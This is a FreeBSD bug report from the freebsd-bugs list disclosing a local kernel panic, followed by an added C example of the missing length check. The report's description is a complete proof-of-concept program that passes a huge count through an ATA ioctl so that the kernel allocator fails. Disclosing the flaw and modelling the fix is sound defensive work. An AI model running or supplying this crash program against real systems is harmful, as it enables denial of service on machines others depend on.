>Number:         136726
>Category:       misc
>Synopsis:       Ata device local denial of service exploit
>Confidential:   no
>Severity:       critical
>Priority:       medium
>Responsible:    freebsd-bugs
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Mon Jul 13 20:00:07 UTC 2009
>Closed-Date:
>Last-Modified:
>Originator:     Vincenzo Barranco
>Release:        6.0 8.0
>Organization:
>Environment:
>Description:
/* atapanic.c
 *
 * Vincenzo Barranco, 13 July 2009
 *
 * this panics the freebsd kernel by passing a large value to malloc(9) in one of
 * fbsd's ata ioctl's. tested on freebsd 6.0 and 8.0. you need read access to the
 * ata device in /dev to be able to open() the device. chain with some race condition
 * bug?
 *
 * - shaun
 *
 */

#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <fcntl.h>

struct ata_ioc_requestz {
    union {
        struct {
            u_int8_t command;
            u_int8_t feature;
            u_int64_t lba;
            u_int16_t count;
        } ata;
        struct {
            char ccb[16];
        } atapi;
    } u;

    caddr_t data;
    int count;
    int flags;

    int timeout;
    int error;
};

#define IOCATAREQUEST _IOWR('a', 100, struct ata_ioc_requestz)

int main() {
    struct ata_ioc_requestz evil;
    int fd;

    evil.count = 0xffffffff;

    fd = open("/dev/acd0", O_RDONLY); /* /dev/acd0 is one of my ata devices */
    ioctl(fd, IOCATAREQUEST, &evil);

    /* should never reach here if kernel panics */
    return 0;
}
>How-To-Repeat:
Run the program on the top
>Fix:
>Release-Note:
>Audit-Trail:
>Unformatted:
_______________________________________________
freebsd-bugs@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-bugs
To unsubscribe, send any mail to "freebsd-bugs-unsubscribe@freebsd.org"
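
The report attributes the panic to a caller-supplied count reaching malloc(9) unchecked. The block below is an added example, not part of the PR and not FreeBSD source: a userland model of the length validation a handler would run before allocating. The struct mirrors the report's fields with <stdint.h> types; EXAMPLE_MAX_REQUEST_BYTES, the function names and the chosen errno values are assumptions.

```c
#include <errno.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical cap on the data buffer for one request; not a FreeBSD constant. */
#define EXAMPLE_MAX_REQUEST_BYTES (128 * 1024)

/* Same fields as the report's struct ata_ioc_requestz, with <stdint.h> types. */
struct ata_ioc_request_model {
    union {
        struct { uint8_t command; uint8_t feature; uint64_t lba; uint16_t count; } ata;
        struct { char ccb[16]; } atapi;
    } u;
    char *data;
    int count;      /* signed: 0xffffffff stored here reads back as -1 */
    int flags;
    int timeout;
    int error;
};

/* What an unchecked handler would ask the allocator for: the signed count
 * converted to size_t, so -1 becomes SIZE_MAX. */
size_t unchecked_alloc_size(const struct ata_ioc_request_model *req)
{
    return (size_t)req->count;
}

/* Validation to run before any allocation. Returns 0 or an errno value. */
int validate_request(const struct ata_ioc_request_model *req)
{
    if (req->count < 0)
        return EINVAL;      /* a negative length is never valid */
    if (req->count > EXAMPLE_MAX_REQUEST_BYTES)
        return EFBIG;       /* larger than the model allows per request */
    if (req->count > 0 && req->data == NULL)
        return EFAULT;      /* a length without a buffer */
    return 0;
}

/* The report's input: only count is set, to 0xffffffff. */
int check_report_input(void)
{
    struct ata_ioc_request_model req;
    memset(&req, 0, sizeof req);
    req.count = (int)0xffffffffu;
    return validate_request(&req);
}
```

Because count is a signed int, the sign check has to come before the upper-bound check; comparing only against a maximum would let -1 through.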